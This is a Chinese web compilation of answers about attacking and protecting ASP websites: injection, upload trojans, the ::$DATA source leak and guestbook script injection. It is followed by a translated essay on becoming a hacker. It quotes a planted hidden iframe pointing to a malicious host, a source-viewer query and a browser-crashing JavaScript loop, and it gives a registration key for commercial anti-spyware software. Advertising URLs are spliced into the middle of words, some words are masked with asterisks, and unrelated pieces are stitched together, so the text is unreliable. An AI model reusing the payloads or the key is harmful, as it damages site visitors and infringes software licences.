攻击asp网站有什么 *** ?如何防范?怎么保护数据库

找注入点

网站页面传递id值做一下过滤，有提交的页面做一下字符过滤

数据库改名.asp

.asa或前面加#%之类的，再者数据库名设置复杂一些

conn文件设置隐蔽一点

呵呵，这些都是些常见的。

ASP网站如何防黑客攻击？

如果只防SQL注入的话，应该没有什么难的，一个就是过虑用户提交来的参数值，还有就是IIS貌似有解析漏洞，这个一般不好搞，比如安装一些像安全狗之类的软件一般可以搞定，更好的办法是换成java的或php的，ASP是入门级的东东了，占用服务器的资源也很大还得数据库的支持。

ASP技术是什么？

从网上找来的

ASP是Active Server Page的缩写，意为“活动服务器网页”。ASP是微软公司开发的代替CGI脚本程序的一种应用,它可以与数据库和其它程序进行交互，是一种简单、方便的编程工具。ASP的网页文件的格式是.asp，现在常用于各种动态网站中。 ASP是一种服务器端脚本编写环境，可以用来创建和运行动态网页或web应用程序。ASP网页可以包含HTML标记、普通文本、脚本命令以及COM组件等。利用ASP可以向网页中添加交互式内容（如在线表单），也可以创建使用HTML网页作为用户界面的web应用程序。 与HTML相比，ASP网页具有以下特点：

（1）利用ASP可以实现突破静态网页的一些功能限制，实现动态网页技术；

（2）ASP文件是包含在HTML代码所组成的文件中的，易于修改和测试；

（3）服务器上的ASP解释程序会在服务器端制定ASP程序，并将结果以HTML格式传送到客户端浏览器上，因此使用各种浏览器都可以正常浏览ASP所产生的网页；

（4）ASP提供了一些内置对象，使用这些对象可以使服务器端脚本功能更强。例如可以从web浏览器中获取用户通过HTML表单提交的信息，并在脚本中对这些信息进行处理，然后向web浏览器发送信息；

（5）ASP可以使用服务器端ActiveX组建来执行各种各样的任务，例如存取数据库、发现哦那个Email或访问文件系统等。

（6）由于服务器是将ASP程序执行的结果以HTML格式传回客户端浏览器，因此使用者不会看到ASP所编写的原始程序代码，可放置ASP程序代码被窃取。

ASP被黑客入侵

由于ASP它本身是服务器提供的一贡服务功能，特别是最近由dvbbs的upfile文件出现漏洞以来，其高度的隐蔽性和难查杀性，对网站的安全造成了严重的威胁。因此针对ASP木马的防范和清除，为网管人员提出了更高的技术要求.

几个大的程序全部被发现存在上传漏洞，小程序更是不计其数，让asp木马一下占据了主流，得到广泛的使用，想必如果你是做服务器的话，一定为此头疼不止吧，特别是虚拟http://www.ninedns.com/webhosting/'主机的用户都遇到过网页被篡改、数据被删除的经历，事后除了对这种行径深恶痛绝外，许多客户又苦于没有行之有效的防范措施。鉴于大部分网站入侵都是利用asp木马完成的，特写此文章以使普通虚拟http://www.ninedns.com/webhosting/'主机用户能更好地了解、防范asp木马。也只有空间商和虚拟http://www.ninedns.com/webhosting/'主机用户共同做好防范措施才可以有效防范asp木马!

我们首先来说一下怎么样防范好了，说到防范我们自然要对asp木马的原理了，大道理我也不讲了，网上的文章有的是，简单的说asp木马其实就是用asp编写的网站程序，甚至有些asp木马就是由asp网站管理程序修改而来的。就比如说我们常见的asp站长助手，等等

它和其他asp程序没有本质区别，只要是能运行asp的空间就能运行它，这种性质使得asp木马非常不易被发觉。它和其他asp程序的区别只在于asp木马是入侵者上传到目标空间，并帮助入侵者控制目标空间的asp程序。严重的从而获取服务器管理员的权限，要想禁止asp木马运行就等于禁止asp的运行，显然这是行不通的，这也是为什么asp木马猖獗的原因!有人要问了，是不是就没有办法了呢，不，有办法的：

之一：从源头入手，入侵者是怎么样上传asp木马的呢？一般哟几种 *** ，通过sql注射手段，获取管理员权限，通过备份http://www.ninedns.com/webhosting/MSSQL.ASP'数据库的功能将asp木马写入服务器。或者进入后台通过asp程序的上传功能的漏洞，上传木马等等，当然正常情况下，这些可以上传文件的asp程序都是有权限限制的，大多也限制了asp文件的上传。(比如：可以上传图片的新闻发布、图片管理程序，及可以上传更多类型文件的论坛程序等)，如果我们直接上传asp木马的话，我们会发现，程序会有提示，是不能直接上传的，但由于存在人为的asp设置错误及asp程序本身的漏洞，给了入侵者可乘之机，实现上传asp木马。

因此，防范asp木马的重点就在于虚拟http://www.ninedns.com/webhosting/'主机用户如何确保自己空间中asp上传程序的安全上，如果你是用别人的程序的话，尽量用出名一点的大型一点的程序，这样漏洞自然就少一些，而且尽量使用最新的版本，并且要经常去官方网站查看新版本或者是最新补丁，还有就是那些http://www.ninedns.com/webhosting/MSSQL.ASP'数据库默认路径呀，管理员密码默认呀，一定要改，形成习惯保证程序的安全性。

那么如果你是程序员的话，我还想说的一点就是我们在网站程序上也应该尽量从安全的角度上编写涉及用户名与口令的程序更好封装在服务器端，尽量少的在ASP文件里出现，涉及到与http://www.ninedns.com/webhosting/MSSQL.ASP'数据库连接地用户名与口令应给予最小的权限; 需要经过验证的ASP页面，可跟踪上一个页面的文件名，只有从上一页面转进来的会话才能读取这个页面。防止ASP主页.inc文件泄露问题; 防止UE等编辑器生成some.asp.bak文件泄露问题等等特别是上传功能一定要特别注意

上面的只是对客户的一些要求，但是空间商由于无法预见虚拟http://www.ninedns.com/webhosting/'主机用户会在自己站点中上传什么样的程序，以及每个程序是否存在漏洞，因此无法防止入侵者利用站点中客户程序本身漏洞上传asp木马的行为。空间商只能防止入侵者利用已被入侵的站点再次入侵同一服务器上其他站点的行为。这也更加说明要防范asp木马，虚拟http://www.ninedns.com/webhosting/'主机用户就要对自己的程序严格把关! 为此我总结了ASP木马防范的十大原则供大家参考：

1、建议用户通过ftp来上传、维护网页，尽量不安装asp的上传程序。

2、对asp上传程序的调用一定要进行身份认证，并只允许信任的人使用上传程序。

这其中包括各种新闻发布、商城及论坛程序，只要可以上传文件的asp都要进行身份认证!

3、asp程序管理员的用户名和密码要有一定复杂性，不能过于简单，还要注意定期更换。

4、到正规网站下载asp程序，下载后要对其http://www.ninedns.com/webhosting/MSSQL.ASP'数据库名称和存放路径进行修改，http://www.ninedns.com/webhosting/MSSQL.ASP'数据库文件名称也要有一定复杂性。建议我公司的客户使用.mdb的http://www.ninedns.com/webhosting/MSSQL.ASP'数据库文件扩展名，因为我公司服务器设置了.mdb文件防下载功能。

5、要尽量保持程序是最新版本。

6、不要在网页上加注后台管理程序登陆页面的链接。

7、为防止程序有未知漏洞，可以在维护后删除后台管理程序的登陆页面，下次维护时再通过ftp上传即可。

8、要时常备份http://www.ninedns.com/webhosting/MSSQL.ASP'数据库等重要文件。

9、日常要多维护，并注意空间中是否有来历不明的asp文件。记住：一分汗水，换一分安全!

10、一旦发现被入侵，除非自己能识别出所有木马文件，否则要删除所有文件。

重新上传文件前，所有asp程序用户名和密码都要重置，并要重新修改程序http://www.ninedns.com/webhosting/MSSQL.ASP'数据库名称和存放路径以及后台管理程序的路径。

Trojan.DL.VBS.Agent病毒是由于网友访问的网站服务器上被放置了iframe，指向一个发送木马的网站。其主要问题在服务器，它会使所有来访者遇到可能的威胁。

现在放这些病毒的破坏者只是在网站的主页或conn.asp文件中加入iframe代码，想利用网站，使访问者的浏览器下载他们的恶意代码，然后他们在访问者的机上搞破坏，如偷游戏密码、偷盗 *** 号码、盗取网上银行密码等等等。

应对方案：

对普通用户来说，只要安装了先进的杀毒软件，访问这个网站就会报警，报告发现某某病毒，然后杀除病毒。以瑞星为例，需要将病毒库升级到18.51.41以上版本。同时要下载安装最新的IE补丁，建议在 *** 不拥挤的早上进行可行性的升级。还有，需要用杀毒软件杀除在缓存中的病毒，清空缓存，这样就可以防范这类木马病毒了。木马克星，反间谍专家等木马专杀软件也可以配合已有的杀病毒软件进行工作。

对二级网站用户来说，根据病毒特点，需要仔细进行首页代码的查询，可以发现index.htm或者default.asp，index.asp这类首页文件修改日期为06.10.28，其页面末尾一般有以下代码：

iframe src="http://www.17hk.com/ziliao/alexa.asp" width="0" height="0" frameborder="0"/iframe

这就是病毒嵌入的类似广告的插入代码，网页启动时，这个链接网站随即启动，并启动其恶意代码对有IE漏洞的本地用户进行木马植入或者侵害。解决办法就是清除掉它，重新覆盖上传即可。

少数静态网页还可能被嵌入了不明的script代码（实际上也是病毒执行脚本），这也需要有经验的二级网站维护者仔细检查并加以清除。

二级网站用户维护须知：

目前， *** 中心已将所有home服务器上的二级网站首页做了初步检查，清除了部分嵌入代码，并将服务器进行了适当升级。

*** 中心在这里提醒各二级网站维护者，随着当前病毒特别是木马病毒的进展，除了要保证网站内容的安全性外，还要格外注意网站代码的安全性，尤其是套用不明的外部代码的时候，必须保证对源代码进行审查，不公开的代码模块原则上不能采用。再发现带有木马代码的网站，原则上， *** 中心将停止其主页发布，取消主页空间。也希望各二级单位积极配合 *** 中心，对网站进一步做自查工作，以提高网站安全性。

Spy Sweeper，专杀木马、间谍、恶意程序，还可实时监控

下载地址：http://download.myrice.com//arts/dn01/dn0106/24189.html

注册码SSDC-OPEN-AAAA-KJEA-PZAK

做好以上防范措施，您的网站只能说是相对安全了，决不能因此疏忽大意，因为入侵与反入侵是一场永恒的战争!

什么是ASP漏洞啊?

ASP就是Active Server Page的缩写。它是一种包含了使用VB Script或Jscript脚本程序代码的网页。当浏览器浏览ASP网页时, Web服务器就会根据请求生成相应的HTML代码然后再返回给浏览器,这样浏览器端看到的 就是动态生成的网页。ASP是微软公司开发的代替CGI脚本程序的一种应用,它可以与数据库和其它程序进行交互。是一种简单、方便的编程工具。在了解了VBSCRIPT的基本语法后，只需要清楚各个组件的用途、属性、 *** ，就可以轻松编写出自己的ASP系统。ASP的网页文件的格式是.ASP。

无论你相不相信，通过 asp，可能可以很方便地入侵 web server、窃取服务器上的文件、捕获 web 数据库等系统的用户口令，甚至恶意删除服务器上的的文件，直至造成系统损坏，这些都决非耸人听闻，而且都确确实实发生过，本文将向你一一揭示这些 asp 存在的漏洞，并提出一些防范意见。

上一篇中给大家着重谈了“ADO 存取数据库时如何分页显示”的问题，有位朋友来信给我指出我在计算页面总数时忽略了 Recordset 对象的一个重要参数“PageCount”，它能在给 Pagesize 赋值后自动得出页面的总数，而无须用“INT(RS.recordcount/PgSz*-1)*-1”这样繁琐的公式。我要感谢这位朋友热心地给我指出程序中的不足，由于这个程序是我在很久以前写的，因为在分页显示的时候记录的总数不一定能整除页面显示记录的数目，而当时我又不能肯定 PageCount 是否能正确得出页面的数目，所以偷懒写了这个公式：），说实话我到现在还都没试过用 pagecount，有兴趣的朋友千万要试一下哦，可别学我的懒惰呀。

最近我在 chinaasp 的 bbs 上讨论问题时发现很多朋友对于 asp 的一些安全性问题不甚了解，甚至不知道如何解决最常见的 asp::$DATA 显示源代码的问题，因此我觉得非常有必要在这里给广大朋友们重点谈一谈这个问题，在征得 chinaasp 飞鸟的同意下，我将他曾经写过的一点关于 asp 漏洞的介绍加上我自己的一些实践经验拿出来给大家详细分析一下这个对于 webmaster 来说至关重要的 asp 的安全性问题。

当去年 ::$DATA 的漏洞被发现并公布的第二天，我曾经检测了当时国内大部分运用 asp 的站点，其中百分之九十九都存在以上可以看见源代码的问题，当日我甚至在微软的站点上抓下了 search.asp 这个文件的源代码。可能你会觉得看到源代码并没有什么大碍，如果作为 webmaster 的你这么想就大错特错了。譬如，如果 asp 程序员将站点的登陆密码直接写在 asp 里，那么一旦源码被发现，他人就可以很容易的进入本不该被看到的页面，我就曾经利用这个 *** 免费成为了一个收费网站的成员（大家可别揭发我哦！），而且很多数据库的连接用户名和密码也都是直接写在 asp 里，一旦被发现，如果你的数据库允许远程访问而且没有设防的话就相当危险了。在一些用 asp 开发的 bbs 程序中，往往使用的是 access mdb 库，如果 mdb 库存放的路径被获知，数据库就很有可能被他人下载，加之如果数据库里含有的密码不加密，那就非常危险了，获取密码的人如果有意进行恶意破坏，他只需要以 admin 身份登陆删除所有 bbs 里的帖子，就够你呛的了。下面列出了目前已经发现的一些漏洞，希望大家提高警惕一、经过实验我们发现， win95+pws 上运行 ASP 程序，只须简单地在浏览器地址栏的 asp 文件名后多加一个小数点 ASP 程序就会被下载下来。 IIS3 也存在同样的问题，如果你目前还在使用 IIS3 一定要测试一下。

二、 iis2、 iis3、 iis4 的一个广为人知的漏洞就是 ::$DATA，通过它使用 ie 的 view source 或 netscape 直接访问该 asp 文件就能轻而易举地看到 asp 代码。 win98+pws4 不存在这个漏洞。

究竟是什么原因造成了这种可怕的漏洞呢？究其根源其实是 Windows NT 特有的文件系统在做怪。有一点常识的人都知道在 NT 提供了一种完全不同于 FAT 的文件系统： NTFS，这种被称之为新技术文件系统的技术使得 NT 具有了较高的安全机制，但也正是因为它而产生了不少令人头痛的隐患。大家可能不知道， NTFS 支持包含在一个文件中的多数据流，而这个包含了所有内容的主数据流被称之为“DATA”，因此使得在浏览器里直接访问 NTFS 系统的这个特性而轻易的捕获在文件中的脚本程序成为了可能。然而直接导致 ::$DATA 的原因是由于 IIS 在解析文件名的时候出了问题，它没有很好地规范文件名。

我们该如何解决这个问题呢？办法有几种：

a、是将 .asp 文件存放的目录设置为不可读（ASP 仍能执行），这样 html、 css 等文件就不能放在这个目录下，否则它们将不能被浏览。

b、是安装微软提供的补丁程序，下载的地址如下（注意针对不同的系统有不同的补丁）：

该补丁是针对 IIS3， Intel 平台

ftp.microsoft.com/bussys/iis/iis-public/fixes/cht/security/iis3-datafix/iis3fixi.exe

该补丁是针对 IIS3， Intel 平台

ftp.microsoft.com/bussys/iis/iis-public/fixes/cht/security/iis3-datafix/iis3fixa.exe

该补丁是针对 IIS4， Alpha 平台

ftp.microsoft.com/bussys/iis/iis-public/fixes/cht/security/iis4-datafix/iis4fixi.exe

该补丁是针对 IIS4， Alpha 平台

ftp.microsoft.com/bussys/iis/iis-public/fixes/cht/security/iis4-datafix/iis4fixa.exe

c、是在服务器上安装 ie4.01sp1，这个是否有效，作者本人没具体试过。

d、存粹作者的个人意见，尽量安装英文版的 NT，而不要使用中文版，究其原因作者也说不清，只是根据实践经验英文版的 NT 较中文版 bug 少，如果哪位朋友知道原因千万要告诉我。

三 . 支持 ASP 的免费主页空间以及虚拟主机服务的服务器面临的问题

1、服务器上的 ASP 代码很可能被人其他拥有 asp 权限的人非法获取。

举个很简单的例子，在微软提供的 ASP1.0 的例程里有一个 .asp 文件专门用来查看其它 .asp 文件的源代码，该文件为 ASPSamp/Samples/code.asp。如果有人把这个程序上传的服务器，而服务器端没有任何防范措施的话，他就可以很容易地查看他人的程序。

例如 :

code.asp?source=/directory/file.asp

2、使用的 ACCESS mdb 数据库可能被人下载一般来说在提供 asp 权限的免费主页服务器上不可能提供代为设定 DSN 的服务，因此 asp 程序使用的数据库通常都局限在使用 mdb 库，而 mdb 远端数据库所在的位置是使用我们在第十四期中讲到过的 DSN-less *** 直接在 asp 中指定的， *** 如下 :

%connstr = "DBQ="+server.mappath("database/source.mdb")+";DefaultDir=;DRIVER={Microsoft Access Driver (*.mdb)};DriverId=25;FIL=MS Access;ImplicitCommitSync=Yes;MaxBufferSize=512;MaxScanRows=8;PageTimeout=5; SafeTransactions=0;Threads=3;UserCommitSync=Yes;"%

正如前文所言，在这种情况下 mdb 库很可能被他人下载，从而造成诸如密码等的泄露。

所以，作为 webmaster 应该采取一定的措施，严禁 code.asp 之类的程序（似乎很难办到 , 但可以定期检索特征代码），限制 mdb 的下载。

3、来自强大的 filesystemobject 组件的威胁

IIS3、 IIS4 的 ASP 的文件操作都可以通过 filesystemobject 实现，包括文本文件的读写目录操作、文件的拷贝改名删除等，但是这个强大的功能也留下了非常危险的“后门”。利用 filesystemobjet 可以篡改下载 fat 分区上的任何文件。即使是 ntfs 分区，如果权限没有设定好的话，同样也能破坏，一不小心你就可能遭受“灭顶之灾”。遗憾的是很多 webmaster 只知道让 web 服务器运行起来，很少对 ntfs 进行权限设置，而 NT 目录权限的默认设置偏偏安全性又低得可怕。因此，如果你是 Webmaster，作者强烈建议你密切关注服务器的设置，尽量将 web 目录建在 ntfs 分区上，目录不要设定 everyone full control，即使是是管理员组的成员一般也没什么必要 full control，只要有读取、更改权限就足够了。

四、 ASP 应用程序可能面临的攻击过去许多 Internet 上 CGI 写的留言本或 BBS 是把客户输入的留言变为一个变量，然后再把这个变量插入到显示留言的 HTML 文件里，因此客户输入的文本如要在 HTML 文件里显示就得符合 HTML 标准，而 CGI 程序里一般都加入了特定的 HTML 语言。当客户输入内容，插入 HTML 文件时，即同时插入到了头尾 HTML 语句中，如：

font 客户输入的变量 /font 但如果把前后的 HTML 标记给敝屏了，就可以做很多事情了。

如输入时打上：

/font 符合 HTML 标准的语句 font 前后的 font 是用来敝屏 CGI 中的 HTML 语句用的。插入到 HTML 文件里的就变成了：

font /font 符合 HTML 标准的语句 font /font 由于这样一个特性，使得写个 javascript 的死循环变得非常容易，只要在输入框中输入：

a href="URL" onMouseover="while(1){window.close('/')}" 或 a herf="URL" onMousever="while(ture){window.close('/')}" 那么就能让其他查看该留言的客户的浏览器因死循环而死掉。 ASP 开发的程序同样可能存在这个问题，因此当你用 asp 编写类似程序时应该做好对此类操作的防范，譬如可以写一段程序判断客户端的输入，并屏蔽掉所有的 HTML、 Javascript 语句。

看完本期后，如果你非常的震惊，那么你必须彻底对你现有的网站或 asp 程序进行一翻检测，看看是否存在上述漏洞。如果你对文中所谈到的漏洞都有所了解并已有足够的对策，那么在恭喜你的同时，还是要提醒你经常查看你的网站和 asp 程序，如果你有数据库也应该经常查看，以防他人利用一些我们未知的漏洞进行攻击。

只会ASP能当黑客吗？

如何成为一名黑客

什么是黑客?

Jargon File中对“黑客”一词给出了很多个定义，大部分定义都涉及高超的编程技术，强烈的解决问题和克服限制的欲望。如果你想知道如何成为一名黑客，那么好，只有两方面是重要的。（态度和技术）

长久以来，存在一个专家级程序员和 *** 高手的共享文化社群，其历史可以追溯到几十年前之一台分时共享的小型机和最早的ARPAnet实验时期。 这个文化的参与者们创造了“黑客”这个词。 黑客们建起了Internet。黑客们使Unix操作系统成为今天这个样子。黑客们搭起了Usenet。黑客们让WWW正常运转。如果你是这个文化的一部分，如果你已经为它作了些贡献，而且圈内的其他人也知道你是谁并称你为一个黑客，那么你就是一名黑客。

黑客精神并不仅仅局限于软件黑客文化圈中。有些人同样以黑客态度对待其它事情如电子和音乐---事实上，你可以在任何较高级别的科学和艺术中发现它。软件黑客们识别出这些在其他领域同类并把他们也称作黑客---有人宣称黑客实际上是独立于他们工作领域的。 但在本文中，我们将注意力集中在软件黑客的技术和态度，以及发明了“黑客”一词的哪个共享文化传统之上。

另外还有一群人，他们大声嚷嚷着自己是黑客，实际上他们却不是。他们是一些蓄意破坏计算机和 *** 系统的人（多数是青春期的少年）。真正的黑客把这些人叫做“骇客”(cracker)，并不屑与之为伍。多数真正的黑客认为骇客们是些不负责任的懒家伙，还没什么大本事。专门以破坏别人安全为目的的行为并不能使你成为一名黑客， 正如拿根铁丝能打开汽车并不能使你成为一个汽车工程师。不幸的是，很多记者和作家往往错把“骇客”当成黑客；这种做法激怒真正的黑客。

根本的区别是：黑客们建设，而骇客们破坏。

如果你想成为一名黑客，继续读下去。如果你想做一个骇客，去读 alt.2600 新闻组，并在发现你并不像自己想象的那么聪明的时候去坐5到10次监狱。 关于骇客，我只想说这么多。

---黑客的态度

黑客们解决问题，建设事物，信仰自由和双向的帮助，人人为我, 我为人人。

要想被认为是一名黑客，你的行为必须显示出你已经具备了这种态度。要想做的好象你具备这种态度，你就不得不真的具备这种态度。但是如果你想靠培养黑客态度在黑客文化中得到承认，那就大错特错了。因为成为具备这些特质的这种人对你自己非常重要，有助于你学习，并给你提供源源不断的活力。同所有有创造性的艺术一样，成为大师的最有效 *** 就是模仿大师的精神---不是仅从理智上，更要从感情上进行模仿。

So，如果你想做一名黑客，请重复以下事情直到你相信它们：

1 这世界充满待解决的迷人问题

做一名黑客有很多乐趣，但却是些要费很多气力方能得到的乐趣。 这些努力需要动力。成功的运动员从健壮体魄，挑战自我极限中汲取动力。同样，做黑客，你必须

要有从解决问题，磨练技术，锻炼智力中得到基本的热望。如果你还不是这类人又想做黑客，你就要设法成为这样的人。否则你会发现，你的黑客热情会被其他诱惑无情地吞噬掉---如金钱、性和社会上的虚名。

（同样你必须对你自己的学习能力建立信心---相信尽管你对某问题所知不多，但如果你一点一点地学习、试探，你最终会掌握并解决它。）

2. 一个问题不应该被解决两次

聪明的脑瓜是宝贵的，有限的资源。当这个世界还充满其他有待解决的有趣问题之时，他们不应该被浪费在重新发明轮子这些事情上。 作为一名黑客，你必须相信其他黑客的思考时间是宝贵的---因此共享信息，解决问题并发布结果给其他黑客几乎是一种道义，这样其他人就可以去解决新问题而不是重复地对付旧问题。

(你不必认为你一定要把你的发明创造公布出去，但这样做的黑客是赢得大家尊敬最多的人。卖些钱来给自己养家糊口，买房买车买计算机甚至发大财和黑客价值也是相容的，只要你别忘记你还是个黑客。)

3. 无聊和乏味的工作是罪恶

黑客们应该从来不会被愚蠢的重复性劳动所困扰，因为当这种事情发生时就意味着他们没有在做只有他们才能做的事情---解决新问题。这样的浪费伤害每一个人。因此，无聊和乏味的工作不仅仅是令人不舒服而已，它们是极大的犯罪。 要想做的象个黑客，你必须完全相信这点并尽可能多地将乏味的工作自动化，不仅为你自己，也为了其他人（尤其是其他黑客们）。

(对此有一个明显的例外。黑客们有时也做一些重复性的枯燥工作以进行“脑力休息”，或是为练熟了某个技巧，或是获得一些除此无法获得的经验。但这是他自己的选择---有脑子的人不应该被迫做无聊的活儿。）

4 自由就是好

黑客们是天生的反权威主义者。任何能向你发命令的人会迫使你停止解决令你着迷的问题，同时，按照权威的一般思路，他通常会给出一些极其愚昧的理由。因此，不论何时何地，任何权威，只要他压迫你或其他黑客，就要和他斗到底。

(这并非说任何权力都不必要。儿童需要监护，罪犯也要被看管起来。 如果服从命令得到某种东西比起用其他方式得到它更节约时间，黑客会同意接受某种形式的权威。但这是一个有限的、特意的交易；权力想要的那种个人服从不是你的给予，而是无条件的服从。)

权力喜爱审查和保密。他们不信任自愿的合作和信息共享---他们只喜欢由他们控制的合作。因此，要想做的象个黑客，你得对审查、保密，以及使用武力或欺骗去压迫人们的做法有一种本能的反感和敌意。

5. 态度不能替代能力

要做一名黑客，你必须培养起这些态度。但只具备这些态度并不能使你成为一名黑客，就象这并不能使你成为一个运动健将和摇滚明星一样。成为一名黑客需要花费智力，实践，奉献和辛苦。

因此，你必须学会不相信态度，并尊重各种各样的能力。黑客们不会为那些故意装模做样的人浪费时间，但他们却非常尊重能力---尤其是做黑客的能力，不过任何能力总归是好的。具备很少人才能掌握的技术方面的能力尤其为好，而具备那些涉及脑力、技巧和聚精会神的能力为更好。

如果你尊敬能力，你会享受提高自己能力的乐趣---辛苦的工作和奉献会变成一种高度娱乐而非贱役。 要想成为一名黑客，这一点非常重要。

基本黑客技术

黑客态度是重要的，但技术更加重要。态度无法替代技术，在你被别的黑客称为黑客之前，有一套基本的技术你必须掌握。 这套基本技术随着新技术的出现和老技术的过时也随时间在缓慢改变。例如，过去包括使用机器码编程，而知道最近才包括了HTML语言。但现在明显包括以下技术：

1 学习如何编程

这当然是最基本的黑客技术。如果你还不会任何计算机语言，我建议你从Python开始。它设计清晰，文档齐全，对初学者很合适。尽管是一门很好的初级语言，它不仅仅只是个玩具。它非常强大，灵活，也适合做大型项目。

但是记住，如果你只会一门语言，你将不会达到黑客所要求的技术水平，甚至也不能达到一个普通程序员的水平---你需要学会如何以一个通用的 *** 思考编程问题，独立于任何语言。要做一名真正的黑客，你需要学会如何在几天内通过一些手册，结合你现在所知，迅速掌握一门新语言。这意味着你应该学会几种不同的语言。

如果要做一些重要的编程，你将不得不学习C语言，Unix的核心语言。其他对黑客而言比较重要的语言包括Perl和LISP。 Perl很实用，值得一学；它被广泛用于活动网页和系统管理，因此即便你从不用Perl写程序，至少也应该能读懂它。 LISP 值得学习是因为当你最终掌握了它你会得到丰富的经验；这些经验使你在以后的日子里成为一个更好的程序员，即使你实际上可能很少使用LISP本身。

当然，实际上你更好四种都会。 (Python, C, Perl, and LISP). 除了是最重要的四种基本语言，它们还代表了四种非常不同的编程 *** ，每种都会让你受益非浅。

这里我无法完整地教会你如何编程---这是个复杂的活儿。但我可以告诉你，书本和课程也不能作到。几乎所有更好的黑客都是自学成材的。真正能起作用的就是去亲自读代码和写代码。

学习如何编程就象学习用自然语言写作一样。更好的做法是读一些大师的名著，试着自己写点东西，再读些，再写点，又读些，又写点....如此往复，直到你达到自己在范文中看到的简洁和力量。

过去找到好的代码去读是困难的，因为很少有大型程序的可用源代码能让新手练手。这种状况已经得到了很大的改善；现在有很多可用的开放源码软件，编程工具和操作系统（全都有黑客写成）。这使我们自然地来到第二个话题...

2 得到一个开放源码的Unix并学会使用、运行它

我假设你已经拥有了一台个人计算机或者有一个可用的（ 今天的孩子们真幸福 :-) ）。新手们最基本的一步就是得到一份Linux或BSD-Unix，安装在个人计算机上，并运行它。

当然，这世界上除了Unix还有其他操作系统。但它们都是以二进制形式发送的---你无法读到它的源码，更不可能修改它。尝试在DOS或Windows的机器上学习黑客技术，就象是在腿上绑了铁块去学跳舞。

除此之外，Unix还是Internet的操作系统。你可以不知道Unix而学会用Internet，但不懂它你就无法成为一名Internet黑客。因为这个原因，今天的黑客文化在很大程度上是以Unix为中心的。（这点并不总是真的，一些很早的黑客对此很不高兴，但Unix和Internet之间的共生关系已是如此之强，甚至连微软也无可奈何)

So，装一个Unix---我个人喜欢Linux，不过也有其他选择。（你也可以在同一台机器上同时运行DOS,Windows和Linux）学会它。运行它。用它跟Internet对话。读它的代码。试着去修改他。你会得到比微软操作系统上好的多的编程工具（包括C,Lisp, Python, and Perl），你会得到乐趣，并将学到比你想象的更多知识。

关于学习Unix的更多信息，请看 The Loginataka.

要得到Linux，请看： 哪里能得到 Linux.

3 学会如何使用WWW和写HTML

大多黑客文化建造的东西都在你看不见的地方发挥着作用，帮助工厂、办公室和大学正常运转，表面上很难看到它对他人的生活的影响。Web是一个大大的例外。即便政客也同意，这个巨大而耀眼的黑客玩具正在改变整个世界。单是这个原因（还有许多其它的）， 你就需要学习如何掌握Web。

这并不是仅仅意味着如何使用浏览器（谁都会），而是要学会如何写HTML，Web的标记语言。如果你不会编程，写HTML会教你一些有助于学习的思考习惯。因此，先建起自己的主页。

但仅仅建一个主页也不能使你成为一名黑客。 Web里充满了各种网页。多数是无意义的，零信息量垃圾。

要想有价值，你的网页必须有内容---必须有趣或对其它黑客有用。这样，我们来到下一个话题....

黑客文化中的地位大教堂与集市”，解释了许多Linux和开放源码文化的运做原理。我还在它的续集“大教堂与集市”，解释了许多Linux和开放源码文化的运做原理。我还在它的续集“开拓智域”一文中有更直接的论述。

FAQ（常问问题解答）

问：你会教我如何做黑客吗？

自从之一次发布此页，我每周都会得到一些请求，要我“教会他如何做黑客”；遗憾的是，我没有足够的时间和精力来做这个；我自己的编程项目已经占用了我110%的时间。

甚至即便我想教你也不可能，黑客基本上是一项需要你自行修炼的的态度和技术。你会发现即使真正的黑客想帮助你，如果你乞求他们填鸭一样教你的话，你不会赢得他们的尊敬。

首先去学习。显示你在尝试，你能靠自己去学习。然后再去向黑客们请教问题。

问：你会帮我“黑”掉一个站点吗？或者教我怎么黑它？

No. 任何在读完FAQ后还问此问题人，都是愚不可及的家伙，即使有时间我也不会理睬。 任何发给我的此类mail都会被忽略或被痛斥。

问：哪里能找到真正的可以与之交流的黑客？

更佳办法是就近参加一个Unix或Linux的用户组，参加他们的会议。

问：我该先学哪种语言？

HTML, 如果你还不会的话.

但它不是一个真正的编程语言。当你准备编程时，我建议你从 Python开始. 会有很多人向你推荐Perl，它比Python还受欢迎，但却难学一些。

C 是非常重要的，但它却是最难学的。不要一开始就尝试学C。

问：开放源码的自由软件不会使程序员饿肚子吗？

这似乎不大可能---到目前，开放源码软件产业创造了而不是消灭了大量工作机会。

如果写一个程序比不写一个程序只是个纯粹经济上的收益的话，无论它是否免费，只要它被完成，程序员都会从中得到回报。而且，无论软件是由多么的free的 *** 开发的，对更新的软件应用的需求总是会有的。

问：我从何学起？哪里有免费的Unix?

本页的其他地方指向最常用的免费Unix。要做一名黑客，你需要自立自强，以及自我教育的能力。

现在开始吧......

都说asp网站安全性差，具体原因是什么？

1、asp是种弱类型的语言，变量不经过定义就可以使用，这就为黑客留下了很大的发挥空间，牛人随便在哪里加上段代码，就可能把你网站中的资料窃取，或者说让你整个网站瘫痪。

2、asp网站维护起来困难，每个网站开发好过后都是要不断更新和维护的，而asp网站各种代码（服务器端代码，客户端代码，样式代码等等）都粘在一起，牵一发而动全身，往往一点小小的更新，就要对整个网站做大手术，几乎相当于重新做一遍，维护成本太大。

3、微软已经几本上停止了对asp的开发，转向更好的.net方向了。所以，可以说，它已经是一种没落的东东了，大多数企业已经放弃了它，转向.net或java了。

补充说明:

1、ASP即Active Server Pages，是MicroSOft公司开发的服务器端脚本环境，可用来创建动态交互式网页并建立强大的web应用程序。

2、当服务器收到对ASP文件的请求时，它会处理包含在用于构建发送给浏览器的HTML（Hyper Text Markup Language，超文本置标语言）网页文件中的服务器端脚本代码。